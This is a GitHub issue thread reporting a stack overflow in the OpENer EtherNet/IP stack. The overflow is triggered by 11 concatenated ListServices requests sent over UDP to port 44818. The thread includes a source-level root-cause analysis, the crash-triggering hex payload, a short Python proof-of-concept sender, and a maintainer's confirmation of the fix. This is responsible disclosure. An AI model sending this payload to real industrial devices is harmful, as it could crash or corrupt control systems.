### ISSUE TITLE
A stack overflow vulnerability when using UDP to send ListServices requests.

### ISSUE THREAD

**Issue by lijunqiang123** [EIPStackGroup/OpENer#445]
Hello, when I use UDP socket on port 44818 to send the `ListServices` request message (IP: `127.0.0.1`), a stack overflow vulnerability occurs. The following is the input message (hexadecimal) that caused the vulnerability (11 sequences of `04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00`, where `04` represents the `ListServices` message): 
```
04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
```
I use the command `./src/ports/POSIX/OpENer lo` to start `OpENer`.

I analyzed the cause of this vulnerability: 
- `CheckAndHandleUdpGlobalBroadcastSocket()` in `generic_networkhandler.c `：First, this function first saves all the requested UDP packets, and then uses `do...while` to process the packets in batches. A sequence of 11 ListServices messages will be looped 11 times by `do...while`.
![1](https://user-images.githubusercontent.com/22146584/232993966-c264eb67-6dcb-4a1b-876c-07fe5c3229ad.png)
- `HandleReceivedExplictUdpData()` in `encap.c`: After this function finishes processing the result of this time, it records the remaining unprocessed bytes (line 212); then, it matches which type of this request belongs to (line 231).
![2](https://user-images.githubusercontent.com/22146584/232994544-5b63dc50-4d6a-4a4a-9e87-b7c179af0f45.png)
- `HandleReceivedListServicesCommand()` in `encap.c`: This function uses the `outgoing_message` structure to save the data of the reply messages. For the `ListServices` command, it first constructs a 24-byte message `head ` (line 299), and then constructs a 26-byte message `data` (line 306-313)). Therefore, every time a `ListServices` request message is processed, a 50-byte reply message will be constructed. However, the input that caused the crash is a sequence of 11 `ListServices` commands. Therefore, every time it is processed, the length of `outgoing_message` will be increased by 50 bytes. The length defined by `outgoing_message` is 512 bytes, so when the request is processed on the 11th (50*11=550>512), it exceeds the length 512, resulting in stack overflow.
![3](https://user-images.githubusercontent.com/22146584/232996588-e804475a-69db-4a60-ae09-2e935957ab98.png)
- `enipmessage.h`
![4](https://user-images.githubusercontent.com/22146584/232996602-9458bcee-d2d0-404d-95b4-21f948e372d4.png)
- `source/CMakeLists.txt`
![5](https://user-images.githubusercontent.com/22146584/232996615-95517287-1440-4a71-9e24-4cbe625692ae.png)
Clear presentation of the cause of the vulnerability:
![6](https://user-images.githubusercontent.com/22146584/232996906-a895f649-0d19-4e5c-aa23-f4f09f30938d.png)

Looking forward to your reply, thank you！

**Comment by CapXilinx** [comment]
Thanks for your report. Am I correct in assuming you tried the lastest commit on the master branch?

**Comment by lijunqiang123** [comment]
Yes, it is the latest commit on the master branch.

**Comment by CapXilinx** [comment]
ok, thanks. Could you please provide could you check https://github.com/EIPStackGroup/OpENer/pull/446 please?

**Comment by lijunqiang123** [comment]
Yes, has this bug been identified and fixed?

**Comment by lijunqiang123** [comment]
Hi, this is the `python` script to reproduce this vulnerability. And I use the command `./src/ports/POSIX/OpENer lo` to start `OpENer`. Thank you for your reply. 
```
import socket

# 创建一个 UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

# UDP 目标地址和端口
udp_addr = ('localhost', 44818)

# UDP 报文的十六进制数据
data = bytes.fromhex('04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00' 
                    '04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00'
                    '04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00'
                    '04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00'
                    '04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00'
                    '04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00'
                    '04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00'
                    '04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00'
                    '04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00'
                    '04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00'
                    '04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00')

# 发送 UDP 报文
sock.sendto(data, udp_addr)

# 关闭 socket
sock.close()
```

**Comment by CapXilinx** [comment]
Thanks, fixed in the mentioned PR #446
